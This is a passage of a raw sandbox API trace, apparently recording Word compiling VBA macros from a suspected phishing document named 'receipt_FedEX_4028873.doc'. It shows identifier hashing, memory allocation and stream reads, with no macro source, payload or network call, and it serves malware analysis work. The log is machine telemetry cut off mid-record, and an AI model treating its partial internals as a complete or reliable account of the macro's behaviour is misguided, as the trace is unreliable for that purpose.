0x10f0f4 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0041.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EditText1_Change") returned 0x10e9b8 [0041.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2bee, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0041.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2bee, cbMultiByte=16, lpWideCharStr=0x3faf748, cchWideChar=16 | out: lpWideCharStr="EditText1_Change") returned 16 [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ind1") returned 0x105a80 [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ind1") returned 0x105a80 [0041.164] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="ind1" | out: _Dst="ind1") returned 0x0 [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton1_Click") returned 0x10c1e4 [0041.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c4a, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0041.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c4a, cbMultiByte=20, lpWideCharStr=0x6b84ff8, cchWideChar=20 | out: lpWideCharStr="CommandButton1_Click") returned 20 [0041.165] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f310, cb=0x100) returned 0x6ba42e0 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText_Change") returned 0x10bee5 [0041.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c82, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0041.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c82, cbMultiByte=16, lpWideCharStr=0x3faf748, cchWideChar=16 | out: lpWideCharStr="ValidText_Change") returned 16 [0041.165] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ba42e0, cb=0x200) returned 0x6ad5eb0 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bol2") returned 0x10f971 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bol2") returned 0x10f971 [0041.165] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="bol2" | out: _Dst="bol2") returned 0x0 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bol1") returned 0x10f970 [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bol1") returned 0x10f970 [0041.166] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="bol1" | out: _Dst="bol1") returned 0x0 [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fh") returned 0x105d3b [0041.166] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f280, cb=0x100) returned 0x6ba42e0 [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doveryboll") returned 0x1034da [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bol2") returned 0x10f971 [0041.166] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="bol2" | out: _Dst="bol2") returned 0x0 [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton2_Click") returned 0x10f9f4 [0041.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d82, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0041.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d82, cbMultiByte=20, lpWideCharStr=0x6b84ff8, cchWideChar=20 | out: lpWideCharStr="CommandButton2_Click") returned 20 [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox1_Change") returned 0x10e73d [0041.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2dba, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0041.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2dba, cbMultiByte=15, lpWideCharStr=0x3faf748, cchWideChar=15 | out: lpWideCharStr="TextBox1_Change") returned 15 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s") returned 0x10106a [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0041.167] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ad5eb0, cb=0x400) returned 0x3e42280 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s") returned 0x10106a [0041.167] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="s" | out: _Dst="s") returned 0x0 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s") returned 0x10106a [0041.167] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="s" | out: _Dst="s") returned 0x0 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s") returned 0x10106a [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s") returned 0x10106a [0041.167] atoi (_Str="62") returned 62 [0041.167] atoi (_Str="1") returned 1 [0041.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CloseDateForm") returned 0x1089d5 [0041.168] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ba42e0, cb=0x200) returned 0x6ad5eb0 [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ComboBox1_Change") returned 0x106108 [0041.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e66, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0041.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e66, cbMultiByte=16, lpWideCharStr=0x3faf748, cchWideChar=16 | out: lpWideCharStr="ComboBox1_Change") returned 16 [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.168] CExposedStream::Read () returned 0x0 [0041.168] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ca4500, cb=0x408) returned 0x6ca4500 [0041.168] CExposedStream::Release () returned 0x1 [0041.168] CExposedStream::Release () returned 0x0 [0041.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x186610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0041.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0041.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x186750, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0041.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0041.169] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c31ff0, cb=0x18) returned 0x6c323b0 [0041.169] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f280 [0041.169] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b9f280) returned 0x80 [0041.169] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d760 [0041.169] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d820 [0041.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x186610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0041.169] CoCreateGuid (in: pguid=0x186340 | out: pguid=0x186340*(Data1=0x4a1993d1, Data2=0x4c2b, Data3=0x4629, Data4=([0]=0xbb, [1]=0xc5, [2]=0xf0, [3]=0xe2, [4]=0x8a, [5]=0x41, [6]=0xe7, [7]=0xd3))) returned 0x0 [0041.169] CoCreateGuid (in: pguid=0x186350 | out: pguid=0x186350*(Data1=0x6977d81b, Data2=0xbe74, Data3=0x4b1f, Data4=([0]=0x91, [1]=0xeb, [2]=0x83, [3]=0xe6, [4]=0x63, [5]=0x34, [6]=0x46, [7]=0xe8))) returned 0x0 [0041.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x186360, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0041.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0041.169] GetLocalTime (in: lpSystemTime=0x186238 | out: lpSystemTime=0x186238*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x29b)) [0041.169] _ultow_s (in: _Value=0x5de83298, _Buffer=0x6c69114, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0041.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="035de83298", cchWideChar=11, lpMultiByteStr=0x1861d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="035de83298", lpUsedDefaultChar=0x0) returned 11 [0041.169] strcpy_s (in: _Dst=0x6a7c218, _DstSize=0x8, _Src="Module1" | out: _Dst="Module1") returned 0x0 [0041.169] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c7b620, cb=0x138) returned 0x6a70680 [0041.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0041.170] wcscpy_s (in: _Destination=0x6c69128, _SizeInWords=0x8, _Source="Module1" | out: _Destination="Module1") returned 0x0 [0041.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0041.170] wcscpy_s (in: _Destination=0x6c69138, _SizeInWords=0x8, _Source="Module1" | out: _Destination="Module1") returned 0x0 [0041.170] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9fd0, cb=0x36) returned 0x6889b30 [0041.170] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b27dc0, cb=0x12) returned 0x6c31ff0 [0041.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x6c) returned 0x6c10780 [0041.170] IMalloc:Free (This=0x7feffc15380, pv=0x6bac630) [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9fd0 [0041.170] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9fd0, cb=0x98) returned 0x6bac630 [0041.170] IMalloc:Free (This=0x7feffc15380, pv=0x6c10780) [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x3d0) returned 0x6ca4920 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9fd0 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6b27dc0 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f310 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a2e0 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a3a0 [0041.170] wcsncpy_s (in: _Destination=0x186320, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0041.170] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0041.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186250, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0041.170] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0041.170] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0041.170] CExposedDocFile::AddRef () returned 0x5 [0041.170] CExposedDocFile::AddRef () returned 0x6 [0041.170] CExposedDocFile::OpenStream () returned 0x0 [0041.170] CExposedDocFile::Release () returned 0x5 [0041.170] CExposedStream::Seek () returned 0x0 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x688) returned 0x6c8af50 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f3a0 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x640) returned 0x69d7150 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9d90 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fb0 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fc0 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9d00 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f430 [0041.170] CExposedStream::AddRef () returned 0x2 [0041.170] CExposedStream::Read () returned 0x0 [0041.170] CExposedStream::AddRef () returned 0x3 [0041.170] CExposedStream::Release () returned 0x2 [0041.170] IMalloc:Alloc (This=0x7feffc15380, cb=0x2ee0) returned 0x6ca4d00 [0041.171] CExposedStream::Read () returned 0x0 [0041.171] CExposedStream::Read () returned 0x0 [0041.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0041.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0041.171] IMalloc:Alloc (This=0x7feffc15380, cb=0x8) returned 0x6c13fd0 [0041.171] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c322d0 [0041.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c13fd0, cbMultiByte=8, lpWideCharStr=0x6c322d0, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0041.171] IMalloc:Free (This=0x7feffc15380, pv=0x6c13fd0) [0041.171] IMalloc:Free (This=0x7feffc15380, pv=0x6c322d0) [0041.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="replacefiles") returned 0x107a9a [0041.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2ec2, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0041.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2ec2, cbMultiByte=12, lpWideCharStr=0x6b84ff8, cchWideChar=12 | out: lpWideCharStr="replacefiles") returned 12 [0041.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.172] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pointA") returned 0x101b0d [0041.172] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.172] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="need") returned 0x1006ec [0041.172] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="later") returned 0x10c161 [0041.173] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f430, cb=0x100) returned 0x6ba42e0 [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f_str") returned 0x107cdf [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="later") returned 0x10c161 [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pointA") returned 0x101b0d [0041.173] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="pointA" | out: _Dst="pointA") returned 0x0 [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f_str") returned 0x107cdf [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.173] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ch") returned 0x105ccc [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_print_header") returned 0x10ccd4 [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="later") returned 0x10c161 [0041.174] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="later" | out: _Dst="later") returned 0x0 [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pointA") returned 0x101b0d [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ch") returned 0x105ccc [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="idial") returned 0x102125 [0041.174] atoi (_Str="1") returned 1 [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="strings_attached") returned 0x10a13e [0041.174] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x5050000 [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ch") returned 0x105ccc [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="idial") returned 0x102125 [0041.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="st") returned 0x105f28 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DataFindSymbols") returned 0x10afc7 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="idial") returned 0x102125 [0041.175] atoi (_Str="2") returned 2 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="st") returned 0x105f28 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="need") returned 0x1006ec [0041.175] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="need" | out: _Dst="need") returned 0x0 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="need") returned 0x1006ec [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="st") returned 0x105f28 [0041.175] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f3a0, cb=0x100) returned 0x6ba43f0 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pointA") returned 0x101b0d [0041.175] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="pointA" | out: _Dst="pointA") returned 0x0 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pointA") returned 0x101b0d [0041.175] atoi (_Str="1") returned 1 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="replacefiles") returned 0x107a9a [0041.175] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="replacefiles" | out: _Dst="replacefiles") returned 0x0 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pointA") returned 0x101b0d [0041.175] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="pointA" | out: _Dst="pointA") returned 0x0 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="need") returned 0x1006ec [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="later") returned 0x10c161 [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DataFindSymbols") returned 0x10afc7 [0041.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050076, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0041.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050076, cbMultiByte=15, lpWideCharStr=0x6b84ff8, cchWideChar=15 | out: lpWideCharStr="DataFindSymbols") returned 15 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ext1") returned 0x107b93 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date_max") returned 0x10d882 [0041.176] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ba42e0, cb=0x200) returned 0x6ad64e0 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m1") returned 0x105e27 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m1") returned 0x105e27 [0041.176] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="m1" | out: _Dst="m1") returned 0x0 [0041.176] atoi (_Str="1") returned 1 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date_max") returned 0x10d882 [0041.176] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="date_max" | out: _Dst="date_max") returned 0x0 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ext1") returned 0x107b93 [0041.177] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="ext1" | out: _Dst="ext1") returned 0x0 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m1") returned 0x105e27 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ext1") returned 0x107b93 [0041.177] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="ext1" | out: _Dst="ext1") returned 0x0 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m1") returned 0x105e27 [0041.177] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ba43f0, cb=0x200) returned 0x6ad7980 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.177] 